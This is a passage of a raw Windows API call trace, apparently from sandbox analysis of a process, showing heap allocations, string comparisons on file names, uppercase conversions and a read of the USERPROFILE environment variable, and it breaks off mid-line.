[0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KRrFzTiR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RrFzTiR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rFzTiR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FzTiR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zTiR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TiR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0221.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73338 [0221.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0221.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73338 | out: hHeap=0x2af0000) returned 1 [0221.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0221.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0221.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0221.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0221.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0221.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0221.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0221.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0221.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0221.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0221.702] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0221.702] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0221.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0221.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0221.702] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0221.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae70 [0221.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0221.703] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0221.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0221.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0221.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0221.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0221.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0221.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0221.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0221.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0221.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0221.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0221.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0221.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0221.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0221.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854380 [0221.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0221.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0221.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0221.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0221.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0221.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0221.704] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0221.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0221.705] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0221.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0221.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0221.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0221.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0221.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38541a0 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0221.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0221.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0221.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0221.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0221.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0221.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0221.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0221.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0221.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0221.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf00 [0221.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0221.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0221.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0221.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0221.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0221.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0221.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0221.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0221.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0221.710] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0221.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0221.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0221.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0221.711] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0221.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0221.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0221.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0221.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0221.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0221.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0221.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0221.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0221.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0221.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0221.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0221.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0221.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0221.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0221.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0221.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0221.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0221.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0221.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0221.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0221.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.712] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0221.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0221.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0221.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0221.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0221.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0221.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0221.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.713] HeapFree (in: hHeap=0x2af0000, 